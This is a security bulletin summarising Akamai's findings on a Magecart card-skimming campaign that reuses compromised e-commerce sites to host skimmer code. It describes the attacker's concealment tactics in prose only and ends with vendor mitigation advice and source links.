Cyber Security Threat Summary:
A cybercriminal affiliated with the Magecart group has successfully infected an undisclosed number of e-commerce websites across the United States, United Kingdom, and five other countries with malware designed to skim credit card numbers and personally identifiable information (PII) from unsuspecting individuals who engage in online purchases on these platforms. However, a novel twist in this malicious campaign involves the exploitation of the same compromised websites as hosts for distributing the card-skimming malware to other targeted sites. Akamai researchers, who discovered this ongoing operation, emphasize that it not only distinguishes itself from previous Magecart activities but also poses a significantly greater threat. According to their assessment, these cyberattacks have persisted for at least a month, potentially impacting tens of thousands of individuals thus far. In addition to the United States and United Kingdom, Akamai has identified affected websites in Brazil, Spain, Estonia, Australia, and Peru as part of this widespread campaign.

“The latest campaign is slightly different in that the attacker is not just injecting a Magecart card skimmer into target sites but is also hijacking many of them to distribute malicious code. "One of the primary advantages of utilizing legitimate website domains is the inherent trust that these domains have built over time," according to the Akamai analysis. "Security services and domain scoring systems typically assign higher trust levels to domains with a positive track record and a history of legitimate use. As a result, malicious activities conducted under these domains have an increased chance of going undetected or being treated as benign by automated security systems." In addition, the attacker behind the latest operation has also been attacking sites running not just Magento but other software, such as WooCommerce, Shopify, and WordPress” (DarkReading, 2023).

Akamai researcher Roman Lvovsky stated in a blog post that one of the most notable aspects of the campaign is the strategic setup of the attackers' infrastructure to carry out the web skimming operation. Prior to launching the campaign, the attackers actively search for vulnerable websites to serve as "hosts" for the malicious code that will be utilized later in the web skimming attack. Akamai's analysis of the campaign revealed the implementation of various tactics by the attacker to obscure the malicious activity. Instead of directly injecting the skimmer into the targeted website, the attacker employed a small JavaScript code snippet within the webpages, which subsequently fetched the malicious skimmer from a host website. To make detection challenging, the attacker designed the JavaScript loader to resemble legitimate third-party services such as Google Tag Manager and Facebook Pixel tracking code. Additionally, the operator of this ongoing Magecart-like campaign leveraged Base64 encoding to conceal the URLs of compromised websites hosting the skimmer. Akamai also discovered code within the skimmer malware that prevented the duplicate theft of credit card and personal information.

Security Officer Comments:
According to Akamai, there were a total of 9,200 Magecart attacks on e-commerce sites in the previous year, with 2,468 sites remaining infected by the end of 2022. These groups typically carry out their operations by discreetly injecting malicious code into legitimate e-commerce websites or exploiting vulnerabilities in third-party components like trackers and shopping carts. When users input their credit card details and other sensitive information on compromised websites' checkout pages, the skimming malware secretly intercepts and sends the data to a remote server. Up until now, Magecart attacks have primarily targeted websites using the open-source Magento e-commerce platform. The latest campaign showcases a slight variation, as the attacker not only injects Magecart card skimmers into targeted sites but also takes control of numerous sites to distribute malicious code.

Suggested Correction(s):
Researchers at Akamai recommend the following:

“To plant a web skimmer, attackers will need to get initial access to the server either by exploiting a vulnerability or by abusing one of the existing third-party scripts. To prevent this initial access to the server, security practitioners are advised to keep up with the most recent patches and complement them by implementing a WAF. However, the complexity, deployment, agility, and distribution of current web application environments — and the various methods attackers can use to install web skimmers — require more dedicated security solutions, which can provide visibility into the behavior of scripts running within the browser and offer defense against client-side attacks. An appropriate solution must move closer to where the actual attack on the clients occurs. It should be able to successfully identify the attempted reads from sensitive input fields and the exfiltration of data (in our testing we employed Akamai Page Integrity Manager). We recommend that these events are properly collected in order to facilitate fast and effective mitigation.”

IOCs:
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains

Source: https://www.darkreading.com/attacks-breaches/different-kind-magecart-card-skimming-campaign
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains